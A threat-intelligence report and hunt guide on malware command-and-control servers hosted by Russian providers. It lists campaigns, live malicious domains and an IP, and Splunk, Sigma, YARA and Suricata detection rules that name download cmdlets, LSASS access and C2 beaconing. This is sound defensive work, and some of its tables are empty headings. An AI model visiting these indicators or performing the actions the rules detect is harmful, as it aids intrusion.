1,250 Russian C2 Servers Mapped: How Five Providers Enable Malware Operations

Between January 1 and April 1, 2026, researchers at Hunt.io identified more than 1,250 active command and control servers spread across 165 Russian ISPs and hosting providers [1]. Hunt.io identified 1,252 C2 servers, 69 phishing sites, and 75 malicious open directories across Russian infrastructure [1]. C2 servers represented the vast majority of detected malicious infrastructure. The concentration is severe: the top five providers host 755 of the 1,250+ detected C2 servers, and the campaigns running on this infrastructure span everything from IoT botnets to state-aligned espionage tooling.

This is not a story about a few rogue VPS accounts slipping through moderation queues. The sheer volume and persistence of malicious hosting across a small cluster of providers points to something structural.

The Big Five: Provider Breakdown

Hunt.io's telemetry puts the top five providers at [1]:

TimeWeb dominates the list. One documented campaign on TimeWeb infrastructure used the ClickFix fake CAPTCHA technique to trick users into executing a PowerShell command, which then downloaded Latrodectus v2.3 malware [2]. REG.RU, one of Russia's largest domain registrars and hosting companies, was directly linked to a Lumma Stealer operation that abused Google Groups as redirectors [2]. PROSPERO OOO has previously appeared in abuse reports, and its continued presence at scale suggests no meaningful remediation has occurred.

The remaining 160 providers contributed the other 40% of detections, but the concentration at the top five is the critical finding. A disproportionate share of malicious infrastructure sits within a small number of networks [1].

Keitaro: The Gray-Market Engine Behind Half the C2 Fleet

Keitaro, a traffic distribution system (TDS) marketed to affiliate marketers, led all malware families with 587 unique C2 IP addresses [1]. That accounts for nearly half the entire dataset.

Keitaro itself is not malware. It is a legitimate traffic redirection platform. But its adoption by cybercriminals for cloaking, filtering, and routing victims to exploit kits and malware payloads has made it the single largest category of C2 infrastructure in this dataset. The scale of abuse shows how a commercial tool becomes foundational to criminal operations when there is no enforcement pressure on the hosting side.

IoT Botnets: Hajime, Mozi, and Mirai Still Thriving

The Hajime IoT botnet maintained 191 C2 endpoints across Russian infrastructure [1]. Mozi and Mirai variants were also present [1]. Kaspersky researchers separately documented the Stan Ghouls group hosting Mirai files on infrastructure linked to prior campaigns [14].

These botnets have been tracked for years. Their persistence on Russian hosting suggests a sustainable model: providers either do not act on abuse reports or do not receive them.

Offensive Security Tooling Hosted in the Open

The dataset included several commercial and open-source offensive frameworks hosted on Russian infrastructure [1]:

Sliver, an open-source red team C2 framework written in Golang, includes a package manager called "armory" for staging additional tools [13]. In one incident response case, a Sliver C2 server at 193.29.13.179 was observed communicating over port 8888 using mTLS [12]. Cobalt Strike remains the standard for advanced persistent threat operations, and its open presence on these networks signals that providers are not screening for obviously malicious payloads.

Active Campaigns: ClickFix, Google Groups Abuse, and Ukrainian Targeting

The observation window captured several distinct campaigns running on this infrastructure.

Latrodectus v2.3 via ClickFix on TimeWeb

A campaign hosted on JSC TIMEWEB used fake CAPTCHA pages (the ClickFix technique) to trick victims into executing PowerShell commands that downloaded Latrodectus v2.3 [2]. Palo Alto's Unit 42 tracked increasing traffic to Latrodectus-controlled domains using ClickFix during March-April 2025, and the technique has continued into 2026 [3]. Latrodectus variants observed in 2025 used JavaScript downloaders to retrieve MSI files and employed large junk JSON variables with names like var_Apple_Palantir38 to evade static analysis [3]. Unit 42 responded to a dozen incidents in 2025 alone where ClickFix was the initial access vector [10].

Lumma Stealer via Google Groups on REG.RU

REG.RU infrastructure supported a Lumma Stealer campaign that used Google Groups as redirectors [2]. CTM360's February 2026 threat intelligence report documented more than 4,000 malicious Google Groups and 3,500 Google-hosted URLs being used in an active campaign [4]. Windows users received Lumma Stealer, while Linux users were served a trojanized Ninja Browser [4]. Attackers infiltrated Google Groups with seemingly legitimate technical discussions containing malicious links [4]. CISA confirmed LummaC2 runs in memory, gathers system information, and exfiltrates it to C2 servers [7].

SmartApeSG Multi-Stage Campaign

The SmartApeSG campaign, observed on March 24, 2026, delivered four malware families in a staged sequence on Hosting Technology LTD infrastructure [6]. The kill chain was precise [6]:

• 17:11 UTC: ClickFix script executed
• 17:12 UTC: Remcos RAT deployed
• 17:16 UTC: NetSupport RAT deployed
• 18:18 UTC: StealC deployed
• 19:36 UTC: Sectop RAT (ArechClient2) deployed

Remcos RAT, StealC, and Sectop RAT packages all used DLL side-loading via legitimate executables [6]. The file jp2launcher.exe, a legitimate Java Runtime Environment component, was used to sideload a malicious msvcp140.dll [10]. NetSupport RAT is a legitimate remote administration tool reconfigured for attacker-controlled servers [6].

UAC-0252: SHADOWSNIFF and SALATSTEALER Targeting Ukraine

Beget LLC infrastructure hosted a UAC-0252 campaign using SHADOWSNIFF and SALATSTEALER infostealers [2][5]. CERT-UA has tracked UAC-0252 intrusions since January 2026, with campaigns using phishing lures impersonating Ukrainian government institutions [5]. The campaign exploits WinRAR vulnerability CVE-2025-8088 [5]. SALATSTEALER is a Go-based infostealer operating as MaaS [5].

This is the campaign most directly tied to state-aligned objectives. GRU Unit 29155 has conducted over 14,000 instances of domain scanning across at least 26 NATO members and deployed WhisperGate destructive malware against Ukraine since January 2022, using VPNs, VPS providers, and public tools like Raspberry Robin and SaintBot [8].

IOC Table

The following indicators appeared verbatim in source material:

IP Addresses

Domains

Filenames

Malware Families Observed on Russian Infrastructure

MITRE ATT&CK Mapping

Detection and Hunting

Network-Level Indicators:

• Monitor for outbound connections to the IP 193.29.13.179:8888 (mTLS) [12].
• Flag DNS queries resolving to the domains healgeni.live, docusign.sa.com, oktacheck.it.com, and hgame33.com [4][10][14].
• Detect mTLS connections on non-standard ports (Sliver's observed behavior on port 8888) [12].
• Geo-flag outbound C2 traffic to Russian ASNs associated with TimeWeb, WebHost1, REG.RU, VDSina, and PROSPERO OOO. While legitimate traffic exists to these providers, C2 beaconing patterns (regular intervals, small payloads, encoded data) should trigger investigation.

Endpoint-Level Indicators:

• Hunt for jp2launcher.exe loading msvcp140.dll from non-standard paths. The legitimate file lives in Java Runtime directories; execution from temp or download folders is suspicious [10].
• Alert on client32.exe (NetSupport RAT) execution, particularly when launched by a browser or script interpreter [10].
• Look for PowerShell execution chains triggered by mshta.exe or browser processes, a signature of ClickFix attacks [3][10].
• Detect MSI file downloads initiated by JavaScript in browser contexts (Latrodectus delivery chain) [3].

SIEM/Log Queries:

• Search proxy logs for traffic to Google Groups containing redirect chains to non-Google domains, a hallmark of the Lumma Stealer campaign [4].
• Query for WinRAR process spawning unexpected child processes, relevant to CVE-2025-8088 exploitation by UAC-0252 [5].
• Monitor for rapid sequential installation of multiple RATs on a single endpoint (the SmartApeSG pattern deployed four families within 2.5 hours) [6].

Analysis

The Hunt.io dataset confirms what many defenders have suspected: a small number of Russian hosting providers serve as the backbone for a vast, diverse C2 ecosystem. C2 servers represented the vast majority of detected malicious infrastructure [1].

The Keitaro TDS numbers deserve particular attention. At 587 C2 IPs, Keitaro accounts for more C2 infrastructure than the next several malware families combined [1]. This tool sits in a gray zone: commercially sold, technically legitimate, but massively abused. Its dominance suggests that a significant portion of Russian-hosted C2 infrastructure supports pay-per-install and traffic distribution schemes rather than targeted espionage.

The UAC-0252 campaign stands apart from the profit-motivated operations. CERT-UA's tracking of SHADOWSNIFF and SALATSTEALER since January 2026 suggests a dual-use operation: intelligence collection paired with potential destructive capability [5]. This mirrors GRU Unit 29155's documented pattern of combining espionage tools with destructive malware like WhisperGate [8].

The SmartApeSG kill chain, deploying four separate malware families within a 2.5-hour window, shows operational maturity [6]. This is not spray-and-pray. It is a structured, sequential deployment designed to maintain persistence even if defenders catch one component.

References

1. Hunt.io, "Exposing Russian Malicious Infrastructure: 1,250+ C2 Servers Mapped Across 165 Providers" - https://hunt.io/blog/russian-malicious-infrastructure-c2-servers-mapped
2. Cybersecurity News, "1,250+ C2 Servers Mapped Across Russian Hosting Across 165 Providers" - https://cybersecuritynews.com/1250-c2-servers-mapped-across-russian-hosting/
3. Palo Alto Unit 42, "Fix the Click: Preventing the ClickFix Attack Vector" - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
4. BleepingComputer, "CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups" - https://www.bleepingcomputer.com/news/security/ctm360-lumma-stealer-and-ninja-browser-malware-campaign-abusing-google-groups/
5. SOC Prime, "UAC-0252 Attack Detection: SHADOWSNIFF and SALATSTEALER Fuel Phishing Campaigns in Ukraine" - https://socprime.com/blog/uac-0252-attacks-using-shadowsniff-salatstealer/
6. SANS ISC, "SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT" - https://isc.sans.edu/diary/SmartApeSG+campaign+pushes+Remcos+RAT+NetSupport+RAT+StealC+and+Sectop+RAT+ArechClient2/32826
7. CISA, "Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations" - https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b
8. CISA, "Russian Military Cyber Actors Target US and Global Critical Infrastructure" - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a
9. CtrlAltIntel, "FancyBear Exposed: Major OPSEC Blunder Inside Russian Espionage Ops" - https://ctrlaltintel.com/threat%20research/FancyBear/
10. GBHackers, "Hackers Exploit ClickFix Tactics to Spread NetSupport RAT, Latrodectus, and Lumma Stealer" - https://gbhackers.com/hackers-exploit-clickfix-tactics/
11. MITRE ATT&CK, "Lumma Stealer, Software S1213" - https://attack.mitre.org/software/S1213/
12. Rapid7, "RCE to Sliver: IR Tales from the Field" - https://rapid7.com/blog/post/2024/02/15/rce-to-sliver-ir-tales-from-the-field/
13. MITRE ATT&CK, "Sliver, Software S0633" - https://attack.mitre.org/software/S0633/
14. Kaspersky Securelist, "Stan Ghouls attacks in Russia and Uzbekistan" - https://securelist.com/stan-ghouls-in-uzbekistan/118738/

Hunt Guide: Hunt Report: Russian Hosting Infrastructure Enabling Diverse C2 Operations

Hypothesis: If threat actors are leveraging Russian hosting providers (TimeWeb, REG.RU, WebHost1, VDSina, PROSPERO) for C2 infrastructure, we expect to observe outbound connections to these ASNs with beaconing patterns, DLL sideloading via jp2launcher.exe, ClickFix-initiated PowerShell execution, and traffic to documented IOCs in our proxy, DNS, and endpoint telemetry.

Intelligence Summary: Hunt.io identified 1,250+ active C2 servers concentrated across five Russian hosting providers between January-April 2026, with 587 Keitaro TDS instances representing nearly half of all infrastructure. Active campaigns include Latrodectus via ClickFix, Lumma Stealer abusing Google Groups, and UAC-0252 targeting Ukraine with SHADOWSNIFF/SALATSTEALER infostealers.

Confidence: High | Priority: Critical

Scope

• Networks: All enterprise networks with external internet connectivity, prioritize DMZ and user workstation VLANs
• Timeframe: Initial sweep: 90 days historical; Continuous hunting: Real-time + 30-day rolling window
• Priority Systems: External-facing web servers, VPN endpoints, email gateways, user workstations with internet access, systems with WinRAR installed

MITRE ATT&CK Techniques

T1574.002 — DLL Side-Loading (Persistence, Privilege Escalation, Defense Evasion) [P1]

SmartApeSG campaign uses jp2launcher.exe (legitimate Java Runtime component) to sideload malicious msvcp140.dll for Remcos RAT, StealC, and Sectop RAT deployment

Splunk SPL:

index=* sourcetype=sysmon EventCode=7 ImageLoaded="*msvcp140.dll" Image="*jp2launcher.exe" | where NOT match(ImageLoaded, "(?i)program files.*java") | stats count by ComputerName, Image, ImageLoaded, ProcessId | sort -count

Elastic KQL:

event.code:7 AND file.name:"msvcp140.dll" AND process.executable:*jp2launcher.exe AND NOT file.path:*\"Program Files"*\Java*

Sigma Rule:

title: Suspicious DLL Side-Loading via jp2launcher.exe
id: 8c5e6b4a-2f3d-4e1a-9b7c-1a2b3c4d5e6f
status: experimental
description: Detects potential DLL side-loading using jp2launcher.exe loading msvcp140.dll from non-standard paths
author: RedSheep Security/Stone
references:
  - https://hunt.io/blog/russian-malicious-infrastructure-c2-servers-mapped
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 7
    Image|endswith: '\jp2launcher.exe'
    ImageLoaded|endswith: '\msvcp140.dll'
  filter:
    ImageLoaded|contains:
      - '\Program Files\Java\'
      - '\Program Files (x86)\Java\'
  condition: selection and not filter
falsepositives:
  - Legitimate Java applications with custom library paths
level: high
tags:
  - attack.defense_evasion
  - attack.persistence
  - attack.t1574.002

Focus on jp2launcher.exe processes spawned from temp directories or user download folders. Legitimate Java processes typically load DLLs from standard Java installation paths.

T1059.001 — PowerShell (Execution) [P1]

ClickFix campaigns trick users into executing PowerShell commands via fake CAPTCHA pages to download Latrodectus v2.3 and other malware

Splunk SPL:

index=* (sourcetype=powershell OR sourcetype=wineventlog) EventCode=4104 | rex field=ScriptBlockText "(?<suspicious_download>Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer|System\.Net\.WebClient)" | search suspicious_download=* | rex field=ScriptBlockText "(?<url>https?://[^\s'\"]+)" | eval parent_process=coalesce(parent_process_name, ParentProcessName) | where match(parent_process, "(?i)(chrome|msedge|firefox|iexplore|mshta)\.exe") | stats count by ComputerName, user, url, parent_process | sort -count

Elastic KQL:

event.code:4104 AND powershell.script_block_text:(*Invoke-WebRequest* OR *Invoke-RestMethod* OR *Start-BitsTransfer* OR *System.Net.WebClient*) AND process.parent.name:(chrome.exe OR msedge.exe OR firefox.exe OR iexplore.exe OR mshta.exe)

Sigma Rule:

title: ClickFix PowerShell Execution Pattern
id: a7c9d4b2-8f1e-4c3a-9d5b-2e7f8a9c1b4d
status: stable
description: Detects PowerShell execution spawned by browser processes, indicative of ClickFix social engineering attacks
author: Unit42 (adapted by RedSheep Security/Stone)
references:
  - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
logsource:
  product: windows
  service: powershell
detection:
  selection_scriptblock:
    EventID: 4104
    ScriptBlockText|contains|all:
      - 'Invoke-'
      - 'http'
  selection_parent:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
      - '\iexplore.exe'
      - '\mshta.exe'
  condition: all of selection_*
falsepositives:
  - Legitimate browser-initiated PowerShell for administrative tasks
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1204.002

Monitor for PowerShell downloads initiated by browser processes. Legitimate browser-spawned PowerShell is rare in enterprise environments.

T1071.001 — Application Layer Protocol: Web Protocols (Command and Control) [P2]

C2 communications to Russian hosting infrastructure using HTTP/HTTPS, including Sliver C2 on port 8888 with mTLS

Splunk SPL:

index=* (sourcetype=proxy OR sourcetype=firewall) dest_ip IN (193.29.13.179) OR dest_port=8888 | eval russian_asn=case(match(dest_asn, "AS13238"), "TimeWeb", match(dest_asn, "AS25532"), "WebHost1", match(dest_asn, "AS197695"), "REG.RU", match(dest_asn, "AS48282"), "VDSina", match(dest_asn, "AS35278"), "PROSPERO", 1=1, "Other") | search russian_asn!="Other" OR dest_ip=193.29.13.179 | bucket _time span=1h | stats count, dc(src_ip) as unique_sources, values(dest_port) as ports, sum(bytes_out) as total_bytes by _time, dest_ip, russian_asn | where count > 10

Elastic KQL:

destination.ip:193.29.13.179 OR destination.port:8888 OR destination.as.number:(13238 OR 25532 OR 197695 OR 48282 OR 35278)

Sigma Rule:

title: Suspicious Outbound Connection to Russian C2 Infrastructure
id: c5e8f9a1-7d3b-4a2c-8e6f-9b1c2d4a7e5f
status: experimental
description: Detects outbound connections to known Russian hosting providers associated with C2 infrastructure
author: RedSheep Security/Stone
references:
  - https://hunt.io/blog/russian-malicious-infrastructure-c2-servers-mapped
logsource:
  category: firewall
detection:
  selection_ip:
    dst_ip: '193.29.13.179'
  selection_port:
    dst_port: 8888
  selection_asn:
    dst_asn:
      - 'AS13238'  # TimeWeb
      - 'AS25532'  # WebHost1
      - 'AS197695' # REG.RU
      - 'AS48282'  # VDSina
      - 'AS35278'  # PROSPERO
  condition: 1 of selection_*
falsepositives:
  - Legitimate business connections to Russian hosting providers
level: medium
tags:
  - attack.command_and_control
  - attack.t1071.001

Focus on connections with beaconing patterns (regular intervals) and connections to port 8888. Validate against business justification for Russian hosting connections.

T1566.002 — Phishing: Spearphishing Link (Initial Access) [P1]

Lumma Stealer campaign abuses Google Groups as redirectors to malicious infrastructure, with 4,000+ malicious groups documented

Splunk SPL:

index=* (sourcetype=proxy OR sourcetype=dns) | rex field=url "groups\.google\.com.*(?<redirect_pattern>http[s]?://[^\s]+)" | search redirect_pattern=* | rex field=redirect_pattern "(?<redirect_domain>[a-zA-Z0-9.-]+\.[a-zA-Z]{2,})" | search redirect_domain IN ("healgeni.live", "*.zhblz.com") OR (redirect_domain=* AND NOT redirect_domain IN ("*.google.com", "*.googleapis.com", "*.gstatic.com")) | stats count by src_ip, user, redirect_domain, url | sort -count

Elastic KQL:

url:*groups.google.com* AND (url:*healgeni.live* OR url:*zhblz.com* OR (url:*http* AND NOT url:*.google.com* AND NOT url:*.googleapis.com*))

Sigma Rule:

title: Google Groups Abuse for Malware Distribution
id: d8a2b5c1-4e7f-3a9d-8b6c-1f2e9d7a4c5b
status: stable
description: Detects access to Google Groups with redirects to non-Google domains, indicative of Lumma Stealer campaigns
author: CTM360 (adapted by RedSheep Security/Stone)
references:
  - https://www.bleepingcomputer.com/news/security/ctm360-lumma-stealer-and-ninja-browser-malware-campaign-abusing-google-groups/
logsource:
  category: proxy
detection:
  selection:
    c-uri|contains: 'groups.google.com'
  suspicious_redirect:
    c-uri|contains:
      - 'healgeni.live'
      - '.zhblz.com'
  external_redirect:
    c-uri|contains|all:
      - 'groups.google.com'
      - 'http'
  filter:
    c-uri|contains:
      - '.google.com'
      - '.googleapis.com'
      - '.gstatic.com'
  condition: selection and (suspicious_redirect or (external_redirect and not filter))
falsepositives:
  - Legitimate Google Groups with external links
level: high
tags:
  - attack.initial_access
  - attack.t1566.002

Alert on Google Groups access followed by downloads from non-Google domains. Block known malicious domains at DNS level.

T1190 — Exploit Public-Facing Application (Initial Access) [P1]

UAC-0252 exploits WinRAR vulnerability CVE-2025-8088 in campaigns targeting Ukraine

Splunk SPL:

index=* (sourcetype=sysmon OR sourcetype=wineventlog) (EventCode=1 OR EventCode=4688) Image="*\\WinRAR.exe" | join type=outer ProcessId [search index=* (sourcetype=sysmon OR sourcetype=wineventlog) (EventCode=1 OR EventCode=4688) ParentImage="*\\WinRAR.exe" | rename ProcessId as ChildProcessId, Image as ChildImage] | where isnotnull(ChildImage) AND NOT match(ChildImage, "(?i)(explorer\.exe|cmd\.exe|powershell\.exe|winrar\.exe)") | stats count by ComputerName, Image, CommandLine, ChildImage, ChildProcessId | sort -count

Elastic KQL:

process.name:"WinRAR.exe" AND event.action:"process_creation" AND process.parent.name:"WinRAR.exe" AND NOT process.name:(explorer.exe OR cmd.exe OR powershell.exe OR winrar.exe)

Sigma Rule:

title: CVE-2025-8088 WinRAR Exploitation Attempt
id: e9f7c8d2-1a4b-5e3f-7c9d-2b8a4f6e1d3c
status: experimental
description: Detects WinRAR spawning unusual child processes, indicative of CVE-2025-8088 exploitation
author: RedSheep Security/Stone
references:
  - https://socprime.com/blog/uac-0252-attacks-using-shadowsniff-salatstealer/
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\WinRAR.exe'
  filter:
    Image|endswith:
      - '\explorer.exe'
      - '\cmd.exe'
      - '\powershell.exe'
      - '\winrar.exe'
      - '\notepad.exe'
  condition: selection and not filter
falsepositives:
  - Custom WinRAR scripts spawning legitimate tools
level: high
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2025.8088

Patch WinRAR immediately. Monitor for WinRAR spawning unexpected processes, especially script interpreters or unsigned executables.

T1055 — Process Injection (Defense Evasion, Privilege Escalation) [P2]

LummaC2 operates in memory to evade detection while gathering system information

Splunk SPL:

index=* sourcetype=sysmon (EventCode=8 OR EventCode=10) | eval suspicious_source=case(match(SourceImage, "(?i)(rundll32|regsvr32|mshta|powershell|wscript|cscript)\.exe"), 1, 1=1, 0) | eval suspicious_target=case(match(TargetImage, "(?i)(lsass|csrss|services|winlogon|explorer)\.exe"), 1, 1=1, 0) | where suspicious_source=1 OR suspicious_target=1 | stats count by EventCode, SourceImage, TargetImage, ComputerName | sort -count

Elastic KQL:

(event.code:8 OR event.code:10) AND (process.name:(rundll32.exe OR regsvr32.exe OR mshta.exe OR powershell.exe OR wscript.exe OR cscript.exe) OR process.target.name:(lsass.exe OR csrss.exe OR services.exe OR winlogon.exe OR explorer.exe))

Sigma Rule:

title: Suspicious Process Access Patterns
id: f1a9d7e3-8c2b-4a5e-6f9c-3d8b7e2a1c4f
status: stable
description: Detects process injection patterns commonly used by infostealers like LummaC2
author: CISA (adapted by RedSheep Security/Stone)
references:
  - https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b
logsource:
  product: windows
  service: sysmon
detection:
  selection_access:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'  # PROCESS_ALL_ACCESS
      - '0x1410'    # PROCESS_VM_READ | PROCESS_QUERY_INFORMATION
  selection_injection:
    EventID: 8
  suspicious_source:
    SourceImage|endswith:
      - '\rundll32.exe'
      - '\regsvr32.exe'
      - '\mshta.exe'
  high_value_target:
    TargetImage|endswith:
      - '\lsass.exe'
      - '\csrss.exe'
  condition: (selection_access or selection_injection) and (suspicious_source or high_value_target)
falsepositives:
  - Security software
  - System management tools
level: high
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055

Focus on process access to LSASS and injection from scripting hosts. Whitelist known security tools.

T1082 — System Information Discovery (Discovery) [P3]

LummaC2 and other stealers enumerate system information before exfiltration

Splunk SPL:

index=* (sourcetype=sysmon OR sourcetype=wineventlog) (EventCode=1 OR EventCode=4688) (CommandLine="*systeminfo*" OR CommandLine="*wmic*" OR CommandLine="*Get-ComputerInfo*" OR CommandLine="*Get-WmiObject*Win32_*") | bucket _time span=5m | stats count, dc(CommandLine) as unique_commands by _time, ComputerName, user | where unique_commands > 3 | sort -count

Elastic KQL:

event.code:(1 OR 4688) AND process.command_line:(*systeminfo* OR *wmic* OR *Get-ComputerInfo* OR *Get-WmiObject*Win32_*)

Sigma Rule:

title: Rapid System Enumeration Activity
id: a8c5f9d1-2b7e-4f3a-8e6d-1c9f7a2b5d4e
status: experimental
description: Detects rapid execution of multiple system enumeration commands indicative of infostealer activity
author: RedSheep Security/Stone
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    CommandLine|contains:
      - 'systeminfo'
      - 'wmic '
      - 'Get-ComputerInfo'
      - 'Get-WmiObject'
      - 'Get-CimInstance'
      - 'query user'
      - 'net config'
      - 'ipconfig /all'
  timeframe: 5m
  condition: selection | count() by ComputerName > 5
falsepositives:
  - System administration scripts
  - Inventory tools
level: medium
tags:
  - attack.discovery
  - attack.t1082

Baseline normal admin activity. Alert on rapid enumeration from non-admin accounts or unusual processes.

T1140 — Deobfuscate/Decode Files or Information (Defense Evasion) [P3]

Latrodectus uses large junk JSON variables with names like var_Apple_Palantir38 to evade static analysis

Splunk SPL:

index=* (sourcetype=powershell OR sourcetype=javascript_logs) | rex field=ScriptBlockText "var_[A-Za-z]+_[A-Za-z]+[0-9]+" | rex field=ScriptBlockText max_match=0 "(?<junk_vars>var_[A-Za-z]+_[A-Za-z]+[0-9]+)" | where mvcount(junk_vars) > 10 | eval script_length=len(ScriptBlockText) | where script_length > 10000 | stats count by ComputerName, user | sort -count

Elastic KQL:

script.content:*var_*_* AND script.length:[10000 TO *]

Sigma Rule:

title: Latrodectus-style JavaScript Obfuscation
id: b7d4e8c2-5f1a-4e8b-9c3d-7a2f6b8e1d5c
status: experimental
description: Detects JavaScript with Latrodectus-style junk variable patterns used for evasion
author: RedSheep Security/Stone
references:
  - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
logsource:
  category: webserver
  product: windows
detection:
  selection:
    ScriptBlockText|re: 'var_[A-Za-z]+_[A-Za-z]+[0-9]+'
  large_script:
    ScriptLength: '>10000'
  condition: selection and large_script
falsepositives:
  - Minified legitimate JavaScript
level: medium
tags:
  - attack.defense_evasion
  - attack.t1140
  - attack.t1027

Focus on scripts with repetitive var_ patterns combined with download functions. May require tuning based on legitimate web app traffic.

Indicators of Compromise

IOC Sweep Queries (Splunk):

index=* (dest_ip="193.29.13.179" OR src_ip="193.29.13.179") | stats count by sourcetype, dest_port, bytes_out | sort -count

index=* (dest="healgeni.live" OR query="healgeni.live" OR url="*healgeni.live*") | stats count by sourcetype, src_ip, user | sort -count

index=* (dest="docusign.sa.com" OR query="docusign.sa.com" OR url="*docusign.sa.com*") | stats count by sourcetype, src_ip, user | sort -count

index=* (dest="oktacheck.it.com" OR query="oktacheck.it.com" OR url="*oktacheck.it.com*") | stats count by sourcetype, src_ip, user | sort -count

index=* (dest="hgame33.com" OR query="hgame33.com" OR url="*hgame33.com*") | stats count by sourcetype, src_ip, user | sort -count

index=* (dest="*zhblz.com" OR query="*zhblz.com" OR url="*zhblz.com*") | stats count by sourcetype, src_ip, user, url | sort -count

index=* (Image="*jp2launcher.exe" OR process_name="jp2launcher.exe" OR file_name="jp2launcher.exe") | stats count by ComputerName, file_path, process_path | sort -count

index=* (ImageLoaded="*msvcp140.dll" OR file_name="msvcp140.dll") | search NOT file_path="*\\System32\\*" | stats count by ComputerName, file_path, file_hash | sort -count

index=* (Image="*client32.exe" OR process_name="client32.exe" OR file_name="client32.exe") | stats count by ComputerName, file_path, file_hash, user | sort -count

YARA Rules

SmartApeSG_DLL_Sideloading — Detects jp2launcher.exe and msvcp140.dll combination used in SmartApeSG campaign

rule SmartApeSG_DLL_Sideloading
{
    meta:
        description = "Detects jp2launcher.exe with suspicious msvcp140.dll for SmartApeSG campaign"
        author = "RedSheep Security/Stone"
        date = "2026-04-07"
        reference = "https://isc.sans.edu/diary/32826"
    
    strings:
        $launcher = "jp2launcher.exe" ascii wide nocase
        $dll = "msvcp140.dll" ascii wide nocase
        $java_sig = "Oracle Corporation" ascii wide
        $suspicious_export1 = "StartRAT" ascii
        $suspicious_export2 = "InstallPayload" ascii
        $suspicious_string1 = "client32.exe" ascii wide
        $suspicious_string2 = "NetSupport" ascii wide
        
    condition:
        uint16(0) == 0x5A4D and
        (($launcher and not $java_sig) or 
         ($dll and any of ($suspicious_*)))
}

Latrodectus_JS_Downloader — Detects Latrodectus JavaScript downloaders with characteristic obfuscation patterns

rule Latrodectus_JS_Downloader
{
    meta:
        description = "Detects Latrodectus JavaScript downloaders with junk variable patterns"
        author = "Unit42 (adapted by RedSheep Security/Stone)"
        date = "2026-04-07"
        reference = "https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/"
    
    strings:
        $junk_pattern = /var_[A-Za-z]+_[A-Za-z]+[0-9]{1,3}/ ascii wide
        $download1 = "Invoke-WebRequest" ascii wide nocase
        $download2 = "Invoke-RestMethod" ascii wide nocase
        $download3 = "Start-BitsTransfer" ascii wide nocase
        $download4 = "System.Net.WebClient" ascii wide
        $msi_pattern = /\.msi["'\s]/ ascii wide nocase
        $b64_pattern = "FromBase64String" ascii wide
        
    condition:
        (#junk_pattern > 10) and
        (any of ($download*) or $msi_pattern) and
        filesize > 10KB and filesize < 500KB
}

NetSupport_RAT_Config — Detects NetSupport RAT client32.exe and configuration patterns

rule NetSupport_RAT_Config
{
    meta:
        description = "Detects NetSupport RAT client32.exe and configuration"
        author = "RedSheep Security/Stone"
        date = "2026-04-07"
        reference = "https://gbhackers.com/hackers-exploit-clickfix-tactics/"
    
    strings:
        $exe = "client32.exe" ascii wide nocase
        $config1 = "NSM.ini" ascii wide nocase
        $config2 = "client32.ini" ascii wide nocase
        $netsupport1 = "NetSupport Manager" ascii wide
        $netsupport2 = "NetSupport Ltd" ascii wide
        $mutex = "NSMTCPIP32" ascii wide
        $port = {00 15 7C 00}  // Port 5500 in little endian
        
    condition:
        uint16(0) == 0x5A4D and
        ($exe or any of ($config*)) and
        (any of ($netsupport*) or $mutex or $port)
}

Suricata Rules

SID 1000001 — Detects Sliver C2 mTLS traffic on port 8888 to 193.29.13.179

alert tls $HOME_NET any -> 193.29.13.179 8888 (msg:"ET MALWARE Sliver C2 mTLS Communication to Known Server"; flow:to_server,established; tls.sni; content:!".google.com"; content:!".microsoft.com"; reference:url,rapid7.com/blog/post/2024/02/15/rce-to-sliver-ir-tales-from-the-field/; classtype:trojan-activity; sid:1000001; rev:1;)

SID 1000002 — Detects HTTP traffic to Lumma Stealer C2 domain healgeni.live

alert http $HOME_NET any -> any any (msg:"ET MALWARE Lumma Stealer C2 Domain healgeni.live in HTTP"; flow:to_server,established; http.host; content:"healgeni.live"; reference:url,bleepingcomputer.com/news/security/ctm360-lumma-stealer-and-ninja-browser-malware-campaign-abusing-google-groups/; classtype:trojan-activity; sid:1000002; rev:1;)

SID 1000003 — Detects DNS queries for fake NetSupport RAT domains

alert dns $HOME_NET any -> any 53 (msg:"ET MALWARE DNS Query for Fake NetSupport RAT Domain"; dns.query; content:"docusign.sa.com"; nocase; reference:url,gbhackers.com/hackers-exploit-clickfix-tactics/; classtype:trojan-activity; sid:1000003; rev:1;)

SID 1000004 — Detects DNS queries for fake Okta phishing domain

alert dns $HOME_NET any -> any 53 (msg:"ET MALWARE DNS Query for Fake Okta Domain oktacheck.it.com"; dns.query; content:"oktacheck.it.com"; nocase; reference:url,gbhackers.com/hackers-exploit-clickfix-tactics/; classtype:trojan-activity; sid:1000004; rev:1;)

SID 1000005 — Detects HTTP traffic to Russian C2 hosting ASNs with beaconing pattern

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Possible C2 Beacon to Russian Hosting Infrastructure"; flow:to_server,established; http.method; content:"POST"; http.uri; pcre:"/^\/(api|update|check|beacon|ping|cmd)/i"; threshold:type both, track by_src, count 5, seconds 300; reference:url,hunt.io/blog/russian-malicious-infrastructure-c2-servers-mapped; classtype:trojan-activity; sid:1000005; rev:1;)

Data Source Requirements

Sources

• Exposing Russian Malicious Infrastructure: 1,250+ C2 Servers Mapped Across 165 Providers
• 1,250+ C2 Servers Mapped Across Russian Hosting Across 165 Providers
• Fix the Click: Preventing the ClickFix Attack Vector
• CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups
